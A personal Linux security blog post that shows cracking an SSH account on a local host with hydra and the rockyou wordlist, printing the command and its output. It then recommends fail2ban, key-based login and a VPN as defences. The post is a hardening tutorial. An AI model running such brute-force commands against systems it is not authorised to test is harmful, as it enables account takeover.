Crack an SSH password with hydra and ways to avoid this in future.

Posted: October 26, 2017. At: 8:48 AM. This was 4 weeks ago. Post ID: 11463
Page permalink: http://securitronlinux.com/bejiitaswrath/crack-a-ssh-password-with-hydra-and-ways-to-avoid-this-in-future/

I used this command to crack a Linux SSH account with hydra.

hydra -l trump -P rockyou.txt ssh://192.168.1.2

And this is the output I got once I managed to crack the user account over SSH. This is why you have fail2ban and other protections against brute force attacks.

┌─[][root@parrot][~/hs]
└──╼ #hydra -l trump -P rockyou.txt ssh://192.168.1.2
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
 
Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-19 13:12:52
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.1.2:22/
[STATUS] 258.00 tries/min, 258 tries in 00:01h, 14344143 to do in 926:38h, 16 active
[STATUS] 252.33 tries/min, 757 tries in 00:03h, 14343644 to do in 947:25h, 16 active
[STATUS] 242.57 tries/min, 1698 tries in 00:07h, 14342703 to do in 985:28h, 16 active
[STATUS] 240.93 tries/min, 3618 tries in 00:15h, 14340783 to do in 992:03h, 16 active
[22][ssh] host: 192.168.1.2   login: trump   password: password01
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-19 13:36:24

One way to avoid this is to block the many connection attempts is to install fail2ban. This will block SSH connection attempts.

sudo apt install fail2ban

This is the Iptables ruleset that fail2ban inserted into my firewall. This is part of the fail2ban framework and will help protect my SSH server from attack.

[email protected]:~# iptables-save 
# Generated by iptables-save v1.6.0 on Thu Oct 26 08:05:42 2017
*filter
:INPUT ACCEPT [16053:23128682]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [8668:543281]
:f2b-sshd - [0:0]
-A INPUT -p tcp -m multiport --dports 22 -j f2b-sshd
-A f2b-sshd -j RETURN
COMMIT
# Completed on Thu Oct 26 08:05:42 2017

Another way is to disable the password login for SSH and use host keys instead.

http://securitronlinux.com/debian-testing/how-to-setup-an-ssh-login-using-host-keys-instead-of-a-password/.

This is a very secure method for logging into a remote server. Just ensure that the key file on your client machine has the right permissions. I use chmod 600 to set it readable only by my user. Check the permissions like this.

jason@jason-desktop:~/Documents$ stat -c '%a' ServerWOPR.pem 
600

Another way to secure an SSH connection is to setup a secure VPN connection to your server and only allow SSH to connect once the VPN connection is established, i.e to 10.8.0.1. And close all ports except the VPN port, which can be port 443.

http://securitronlinux.com/bejiitaswrath/easy-way-to-setup-a-working-openvpn-configuration-on-ubuntu-server-on-amazon-aws/.

This is a very secure way to connect over SSH. Once the user is connected over an encrypted channel, then using SSH, it would be very hard to snoop on the connection.

LInux filesystem error in a supermarket.
LInux filesystem error in a supermarket.

These tips will make your SSH server more secure against online attack.

No comments have been made. Use this form to start the conversation :)

Leave a Reply